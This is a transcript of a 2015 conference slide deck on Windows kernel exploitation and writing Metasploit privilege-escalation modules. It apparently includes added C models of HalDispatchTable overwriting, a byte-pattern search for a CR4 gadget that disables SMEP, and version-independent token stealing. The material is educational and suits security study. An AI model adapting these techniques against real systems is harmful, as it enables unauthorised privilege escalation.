The document discusses kernel exploitation on Windows systems. It provides an overview of common vulnerability classes like write-what-where and use-after-free. It also covers techniques for executing code, mitigation technologies, writing exploits for Metasploit, and sources of instability. The speaker's background and agenda are introduced at the start.
Metasploit & Windows Kernel Exploitation
1. Metasploit & Windows Kernel Exploitation
Spencer McIntyre (@zeroSteiner), BSides Cleveland, Saturday June 20th, 2015
2. Agenda
• Agenda
• Kernel Exploitation Overview & Basics
• Common Vulnerability Classes
• Executing Code
• Mitigation Technologies
• Kernel Exploits in MSF
• Writing Windows Kernel exploits for MSF
• Common Techniques Employed By MSF Modules
• Improving Reliability
3. About Me
• Spencer McIntyre
• Work at SecureState
• Research, Development, “Special” Projects
• BSOD-inducer
• Avid open source contributor
• Metasploit among others
• Python enthusiast
• I can haz acronyms?
• OSCP, OSEE
4. BSOD Warning
• BSODs are imminent
• None of the solutions here are fit-all
• Just aggregated from personal experience
Bug check from MS14-040 due to corrupted structures
6. Overview
• Why Kernel Exploitation?
• Downward trend of RCE over last couple years
• Last “Great” RCE MS08-067
• New RCE are generally in 3rd party software / libraries
• The kernel is always there
• Upward trend of client side exploitation as a foothold
• Social engineering
• Some great vulnerabilities coming from Pwn2Own and the wild
7. Recent Windows Kernel Vulnerabilities
Name                        Advisory / Details Released   Public Exploit Code?
MS14-058 / CVE-2014-4113    October 14th, 2014            Yes
MS14-070 / CVE-2014-4076    November 11th, 2014           Yes
MS15-010                    February 10th, 2015           Yes
MS15-034 / CVE-2015-1635    April 14th, 2015              Yes (DoS)
MS15-051 / CVE-2015-1701    April 18th, 2015              Yes
• Incomplete list of recent “notable” vulnerabilities as of June 15th, 2015
• Notable because additional details were published outside the MSB / CVE boilerplate verbiage
8. Common Vulnerability Classes
• Write-What-Where
• NULL Pointer Dereference
• Use After Free (UAF)
• Honorable Mention: Stack Buffer Overflow
• Exist, but not particularly common in Kernel land
9. Write-What-Where
• (Sometimes) Controlled data can be written to an attacker-controlled location
• nt!HalDispatchTable is a popular target
• Exploitation is often stable
• Commonly exploited with IOCTL routines using NtDeviceIoControlFile
• Also more common than other classes in third party drivers
• Example exploits:
• MS11-080
• MS14-070
10. NULL Pointer Dereference
• Occurs when a NULL pointer is dereferenced as if it pointed to a valid object
• Exploitation is often stable
• NULL page can not always be mapped, mitigations exist
• Sometimes negative numbers from error statuses are used as pointers
• MS14-058 / CVE-2014-4113 for example
• Can be beneficial on 64-bit systems if truncated to a 32-bit number (resulting in 0x00000000ffffffff being used)
• Example Exploits:
• MS13-081
• MS14-058
11. Use After Free
• Pointer to an object is used after it has been freed
• Successful exploitation often requires re-allocating the freed object
• Not always reliable, depends on successful reallocation
• Examples:
• MS15-020
12. Vulnerability To Code Execution
• Techniques dependent on class
• Write-What-Where
• Well documented, overwrite nt!HalDispatchTable+0x4 (the HalQuerySystemInformation entry; +0x8 on 64-bit)
• HalDispatchTable can be resolved from ntkrnlpa.exe / ntoskrnl.exe: load the kernel image in user mode, GetProcAddress the export, rebase to the real kernel base
• Triggered on demand with NtQueryIntervalProfile
• NULL Pointer Dereference & UAF
• Similar in the sense that they are object-dependent
• UAF is more difficult to set up the object (not in user-land address space)
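The write-what-where path above, as an added model written for this page (it is not Metasploit's or Windows' code): a fake dispatch table stands in for nt!HalDispatchTable, a fake NtQueryIntervalProfile calls through its second slot, the exploit rebases the symbol the way the user-mode LoadLibrary/GetProcAddress trick does, overwrites the slot with a pointer-sized write, triggers it, and the payload restores the slot before returning (the same restore the later “Corrupted Structures” slide asks for). All addresses and names prefixed fake_ are invented for the model.

```c
/* Constructed model (not Windows or Metasploit code) of the classic
 * write-what-where -> nt!HalDispatchTable technique. The "kernel" is a
 * dispatch table plus a function that calls through its second slot. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef uintptr_t (*hal_fn_t)(void);

/* benign occupant of slot 1, standing in for HalQuerySystemInformation */
static uintptr_t fake_HalQuerySystemInformation(void) { return 0; }

/* stand-in for nt!HalDispatchTable; slot 1 is what +0x4 / +0x8 points at */
static hal_fn_t fake_HalDispatchTable[4] = { 0, fake_HalQuerySystemInformation, 0, 0 };

/* stand-in for NtQueryIntervalProfile -> KeQueryIntervalProfile, which
 * ends up calling HalDispatchTable[1] for a profile source it does not know */
static uintptr_t fake_NtQueryIntervalProfile(void) {
    return fake_HalDispatchTable[1]();
}

/* User-mode resolution: LoadLibrary the kernel image, GetProcAddress the
 * export, then rebase onto the real kernel base (e.g. from EnumDeviceDrivers).
 * kernel VA = kernel base + (user-mode symbol address - user-mode load base) */
uintptr_t rebase_symbol(uintptr_t user_base, uintptr_t user_sym,
                        uintptr_t kernel_base) {
    return kernel_base + (user_sym - user_base);
}

/* The primitive the vulnerability provides: write `what` at `where`.
 * memcpy keeps this valid C regardless of what type lives at `where`. */
static void write_what_where(uintptr_t what, uintptr_t where) {
    memcpy((void *)where, &what, sizeof what);
}

static hal_fn_t saved_slot;   /* backup taken before corrupting the table */
static int payload_ran;

/* The payload: do the elevated work (a flag here), then put the original
 * pointer back so the next legitimate caller does not crash the box. */
static uintptr_t payload(void) {
    payload_ran = 1;
    fake_HalDispatchTable[1] = saved_slot;
    return 0xC000000D; /* STATUS_INVALID_PARAMETER: the trigger call fails harmlessly */
}

/* Returns 1 when the payload ran and the table was restored afterwards. */
int exploit_hal_dispatch_table(void) {
    uintptr_t table = (uintptr_t)fake_HalDispatchTable;
    payload_ran = 0;
    saved_slot = fake_HalDispatchTable[1];
    /* "what": payload address; "where": table + one pointer, i.e. slot 1 */
    write_what_where((uintptr_t)payload, table + sizeof(uintptr_t));
    fake_NtQueryIntervalProfile();   /* trigger on demand */
    return payload_ran && fake_HalDispatchTable[1] == saved_slot;
}
```

The restore inside the payload is the important habit: once the slot is overwritten, every process calling NtQueryIntervalProfile with an unknown source lands in your code, so the shellcode must leave the table as it found it.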
13. NULL Pointer Dereference / UAF
• An object is corrupted
• For UAF a replacement object is created
• No easy way to determine a suitable object
• Object size, layout and destination heap all must be considered
• Object needs to provide a primitive
• Generally Write-What-Where or Call
14. Useful Object: tagWND (Window)
• win32k!tagWND
• Pretty common object (CVE-2014-4113)
• Set two values for kernel code execution
• bServerSideWindowProc (Bit flag)
• lpfnWndProc (Pointer)
• Callback function can be triggered on demand
15. Mitigation Technologies
• Commonly encountered on modern systems
• The days of jmp-esp died with XP
• Address Space Layout Randomization (ASLR)
• Only a semi-issue due to already having code execution
• Only need to worry about kernel addresses
• Driver bases can be determined from user mode (EnumDeviceDrivers / NtQuerySystemInformation(SystemModuleInformation))
• Memory leaks or read primitives can disclose additional kernel addresses
• LoadLibrary & GetProcAddress are your friends: load the kernel image as a user-mode DLL to resolve exports, then rebase to the real kernel base
• Data Execution Prevention (DEP)
• NtAllocateVirtualMemory, VirtualProtect
• SMEP can be an issue (more on this later)
16. Mitigation Technologies
• NULL Page Mapping
• One of the oldest protections in EMET
• Pre-Allocate and squat on the page, mark with PAGE_NOACCESS
• Get around it by avoiding it (migrate into an unprotected process if
possible)
• Supervisor Mode Execution Protection (SMEP)
• Prevents user-land addresses from being executed from the Kernel
context
• Intel CPU feature (Ivy Bridge and later)
• Support added to Windows 8
18. Disabling SMEP
• Some well-documented techniques
• See the “Further Reading & Resources” slide
• Use a ROP gadget in nt!KiConfigureDynamicProcessor to clear the SMEP bit (bit 20) in the CR4 register
• Resolve the kernel address of the ROP gadget
• A few drawbacks to this approach
• Can’t be resolved with GetProcAddress like nt!HalDispatchTable (not an export; locate it by offset or byte pattern)
• It’s in the PAGELK section on Windows 8.1, so it may not be resident when you jump to it
• Requires running in the native architecture, i.e. not WOW64
• If the kernel can’t be loaded (WOW64 or sandbox) a read primitive needs to be available for resolution
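Locating the gadget by byte pattern, as an added example that is not part of the original slides or of Metasploit: given a copy of the kernel's mapped code bytes, find a `mov cr4, rax` (0F 22 E0) with a `ret` in reach, rebase the offset, and compute the CR4 value with bit 20 cleared. The sample bytes are constructed here, including a decoy `mov cr4, rax` with no nearby `ret`; the section RVA and kernel base in the usage are made-up values.

```c
/* Constructed example (not Metasploit or Windows code): find the
 * "mov cr4, rax ... ret" gadget used to clear CR4.SMEP and compute the
 * value to load through it. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CR4_SMEP_BIT ((uint64_t)1 << 20)   /* Intel SDM: CR4.SMEP is bit 20 */

/* mov cr4, rax encodes as 0F 22 E0. A usable gadget needs a ret (C3) within
 * `window` bytes of it, e.g. "mov cr4, rax; add rsp, 0x28; ret" in
 * nt!KiConfigureDynamicProcessor. Returns the byte offset or -1. */
long find_mov_cr4_gadget(const uint8_t *code, size_t len, size_t window) {
    static const uint8_t mov_cr4_rax[] = { 0x0F, 0x22, 0xE0 };
    for (size_t i = 0; i + sizeof mov_cr4_rax <= len; i++) {
        if (memcmp(code + i, mov_cr4_rax, sizeof mov_cr4_rax) != 0)
            continue;
        size_t start = i + sizeof mov_cr4_rax;
        size_t end = start + window < len ? start + window : len;
        for (size_t j = start; j < end; j++)
            if (code[j] == 0xC3)
                return (long)i;
        /* a mov cr4 with no ret in reach is not a gadget; keep scanning */
    }
    return -1;
}

/* Offset in the scanned bytes -> kernel virtual address. The bytes must be a
 * copy of the mapped section (section RVA known), not raw file bytes. */
uint64_t gadget_va(uint64_t kernel_base, uint64_t section_rva, long offset) {
    return kernel_base + section_rva + (uint64_t)offset;
}

/* value to place in rax before returning into the gadget */
uint64_t cr4_without_smep(uint64_t cr4) {
    return cr4 & ~CR4_SMEP_BIT;
}

/* constructed sample .text: a decoy (mov cr4, rax with no ret in reach)
 * followed by the real gadget */
const uint8_t sample_text[] = {
    0x90, 0x90,
    0x0F, 0x22, 0xE0,             /* mov cr4, rax          (offset 2)  */
    0x48, 0x8B, 0xC1,             /* mov rax, rcx                      */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x0F, 0x22, 0xE0,             /* mov cr4, rax          (offset 16) */
    0x48, 0x83, 0xC4, 0x28,       /* add rsp, 0x28                     */
    0xC3                          /* ret                               */
};
const size_t sample_text_len = sizeof sample_text;
```

The scan needs the bytes of the mapped image (or a read primitive over the live kernel), which is exactly the WOW64/sandbox limitation the slide lists; and because the gadget lives in PAGELK, a practitioner checks residency (or forces it) before pivoting into it.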
20. Metasploit Windows Kernel Modules
• Divided into two categories based on implementation
• Ruby (relying heavily on RailGun)
• C (implemented as a Reflectively-loadable DLL)
• Don’t have to be local privilege escalation but almost all are
• Almost all directly steal / duplicate the token
• An alternative approach is to “clear” the ACL of a SYSTEM process to inject into (e.g. ms13_053_schlamperei)
• Msf::Exploit::Local::WindowsKernel mixin for convenience methods
21. Ruby Implementations
• Might be eventually deprecated in favor of RDLL [1]
• Well suited for simple NtDeviceIoControlFile-centric exploits
• e.g. MS11-080, MS14-002, MS14-070
• Benefits are that the exploit is a self-contained ruby file
• Failed attempts result in a lost session due to self-corruption
[1] Details in issue #4715 https://github.com/rapid7/metasploit-framework/issues/4715
22. C Implementations
• Much more flexible
• Threads can be used
• Can be faster to write if extensive Windows API calls are necessary
• PoC exploits can be developed as standalone executables
• Primary benefit is the exploit can be injected into a dummy
process
• Results in stability if the exploit fails without a BSOD
23. Writing a Kernel Exploit for Metasploit
• C / Reflective DLL style is preferred
• General Steps:
1. Environment detection
• Is the session a meterpreter or running as SYSTEM?
2. Vulnerability check
• Often implemented in the “check” function, result is verified
• Checks are often for the file version and running services
3. Start a dummy process to host the malicious DLL
• If in a sandbox, load the DLL in the session process
4. The RDLL will (hopefully) exploit the vulnerability successfully and open
a new session
24. Shellcode
• Options are traditional raw bytecode or C, but only for RDLLs
• C implementation is preferable and more reliable
• Different versions of Windows have different token offsets
• Generic implementation uses PsLookupProcessByProcessId then find and replace
• Works across Windows versions
26. Sources of Instability
• Corrupted structures
• Token reference count
• Returning control after elevation
27. Corrupted Structures
• Certain objects are in a shared region between user & kernel lands [1]
• Handle table information without a system call for efficiency
• user32!gSharedInfo is available since Windows 7
• Region is read-only
• Back it up
• Read-only so restore from within the shellcode
• If structures are corrupted and code execution does not occur a BSOD is imminent without a reliable write primitive
• nt!HalDispatchTable
[1] https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf
28. Token Reference Count
• “Stealing” the token can cause issues
• Token object has a reference count
• Possible workarounds
• Clear an ACL from a process
• Process still might die and cause instability
• Duplicate the token
• Not practical from raw shellcode
• Backup original token, Steal the token, Spawn a new shell, Restore the token
• Is practical from raw shellcode
• Exploit must be reliably triggered twice
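The “find and replace” token shellcode from the Shellcode slide and the reference-count problem from this slide, as one added model written for this page (it is not Metasploit's shellcode and the structures are not real Windows layouts): the EPROCESS, TOKEN, EX_FAST_REF bit counts, offsets and fake_ routines are constructed stand-ins. The scan locates the Token offset without knowing the Windows version; the two runs then compare a plain steal against backup / steal / spawn / restore when the elevated process exits.

```c
/* Constructed model (not Metasploit's shellcode, not Windows structures) of
 * version-independent token stealing and the reference count it unbalances. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* TOKEN object: the object-header pointer count is what ObDereferenceObject
 * decrements; when it reaches zero the object is freed */
typedef struct { long pointer_count; int is_system; } fake_token;

/* EPROCESS: Token is an EX_FAST_REF (pointer with cached references in the
 * low bits) at an offset that differs between Windows versions */
typedef struct {
    uint8_t   header[0x18];
    uint32_t  unique_process_id;
    uint8_t   version_dependent_fields[0x50];
    uintptr_t token;
    uint8_t   trailer[0x20];
} fake_eprocess;

/* 4 reference bits on 64-bit (16-byte aligned objects), 3 on 32-bit */
#define EX_FAST_REF_MASK ((uintptr_t)(sizeof(void *) == 8 ? 0xF : 0x7))

static uint8_t       token_pool[128];   /* tokens placed 16-byte aligned, like pool allocations */
static fake_token   *system_token, *original_token;
static fake_eprocess system_proc, current_proc;

static fake_token *token_of(uintptr_t fast_ref) {
    return (fake_token *)(fast_ref & ~EX_FAST_REF_MASK);
}
static void fake_ObDereferenceObject(fake_token *t) { t->pointer_count--; }  /* 0 = freed */
static fake_token *fake_PsReferencePrimaryToken(const fake_eprocess *ep) {
    fake_token *t = token_of(ep->token);
    t->pointer_count++;                   /* caller owes a dereference */
    return t;
}
static fake_eprocess *fake_PsLookupProcessByProcessId(uint32_t pid) {
    return pid == 4 ? &system_proc : NULL;
}
static fake_eprocess *fake_PsGetCurrentProcess(void) { return &current_proc; }
/* teardown drops the one reference a process holds on its primary token */
static void fake_process_exit(fake_eprocess *ep) {
    fake_ObDereferenceObject(token_of(ep->token));
}

/* "find": scan the EPROCESS for a value that equals the token pointer once
 * the EX_FAST_REF bits are masked off; independent of the Windows version */
long find_token_offset(const fake_eprocess *ep, const fake_token *tok) {
    const uint8_t *base = (const uint8_t *)ep;
    for (size_t off = 0; off + sizeof(uintptr_t) <= sizeof *ep; off += sizeof(uintptr_t)) {
        uintptr_t v;
        memcpy(&v, base + off, sizeof v);
        if ((v & ~EX_FAST_REF_MASK) == (uintptr_t)tok) return (long)off;
    }
    return -1;
}

static void reset_world(void) {
    uintptr_t p = ((uintptr_t)token_pool + 15) & ~(uintptr_t)15;
    system_token   = (fake_token *)p;
    original_token = (fake_token *)(p + 32);
    *system_token   = (fake_token){ 1, 1 };   /* held once, by the System process */
    *original_token = (fake_token){ 1, 0 };   /* held once, by our process */
    memset(&system_proc, 0, sizeof system_proc);
    memset(&current_proc, 0, sizeof current_proc);
    system_proc.unique_process_id  = 4;
    system_proc.token  = p | 0x3;             /* cached references in the low bits */
    current_proc.unique_process_id = 1234;
    current_proc.token = (p + 32) | 0x1;
}

/* "replace": copy SYSTEM's token reference into the current process. With
 * restore_after set, follow backup / steal / spawn / restore. Returns the
 * SYSTEM token's count after our process exits: 1 is balanced, 0 means it
 * was freed out from under the System process (the BSOD-on-exit case). */
long run_token_steal(int restore_after) {
    reset_world();
    fake_eprocess *sys = fake_PsLookupProcessByProcessId(4);
    fake_eprocess *cur = fake_PsGetCurrentProcess();
    fake_token *sys_tok = fake_PsReferencePrimaryToken(sys);
    long off = find_token_offset(sys, sys_tok);
    fake_ObDereferenceObject(sys_tok);        /* balance the reference we took */
    if (off < 0) return -1;

    uintptr_t backup;
    memcpy(&backup, (uint8_t *)cur + off, sizeof backup);               /* backup */
    memcpy((uint8_t *)cur + off, (uint8_t *)sys + off, sizeof backup);  /* steal: no reference taken */
    /* ... spawn the elevated shell here; it receives its own token reference ... */
    if (restore_after)
        memcpy((uint8_t *)cur + off, &backup, sizeof backup);           /* restore: the second kernel write */
    fake_process_exit(cur);
    return system_token->pointer_count;
}

long original_token_count(void) { return original_token->pointer_count; }
long stolen_token_offset(void) {
    reset_world();
    return find_token_offset(&system_proc, system_token);
}
```

The plain steal leaves the original token with a reference nobody will release and takes one off the SYSTEM token that was never added; the restore variant keeps both counts honest at the cost of triggering the kernel write a second time, which is the reliability trade-off the slide describes.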
29. Returning Control
• What to do if process dies after elevation?
• Find a suitable location to return control to
• Unwind the stack via assembly
• Microsoft uses a standard calling convention
• Not applicable in every situation, depends on the call
• Trivial to differentiate a user-land address vs kernel-land
30. Returning Control
• Last call in user-land ntdll!KiFastSystemCallRet
• First call in kernel-land nt!KiSystemServicePostCall
• KiSystemServicePostCall performs cleanup operations and restores the user-mode context
• Can not directly return to user-land
• System call will probably fail but the status can be set
• Be careful about allowing it to succeed
32. 64-bit Exploitation
• Starting to pick up
• Exploits being written in C to support both architectures
• x64 uses one calling convention, only one
• WOW64 complicates things
• For Metasploit, migrate into or spawn a native process
• Check for pointer truncation
• Might help, might not
33. Closing Thoughts
• Kernel exploitation is flexible
• Code execution ahead of time can be leveraged
• Size matters not
• Hypothesis: Kernel exploitation is going to stick around for a while
35. Further Reading & Resources
• Kernel Attacks Through User-Mode Callbacks
• Tarjei Mandt, Black Hat USA 2011
• https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf
• SMEP: What is it, and how to beat it on Windows
• Mateusz ‘j00ru’ Jurczyk & Gynvael Coldwind
• http://j00ru.vexillium.org/?p=783
• Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite exploitation using HalDispatchTable
• poppopret, Sunday, July 17th, 2011
• http://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html
• Polishing Chrome for Fun and Profit
• Nils & Jon, August 29th, 2013
• https://labs.mwrinfosecurity.com/system/assets/538/original/mwri_polishing-chrome-slides-nsc_2013-09-06.pdf
36. Further Reading & Resources
• Pwn2Own 2014: AFD.sys Dangling Pointer Vulnerability
• Sebastian Apelt, July 11th, 2014
• http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
• One-Bit To Rule Them All: Bypassing Windows’ 10 Protections using a Single Bit
• Udi Yavo, February 10th, 2015
• http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-10-protections-using-single-bit/
37. • Spencer McIntyre
• Twitter: @zeroSteiner
• Check out “Phishing Without Ruby”
• I’ll be co-presenting with Brandan Geise
• Downstairs at 4PM
Thank You For Your Time!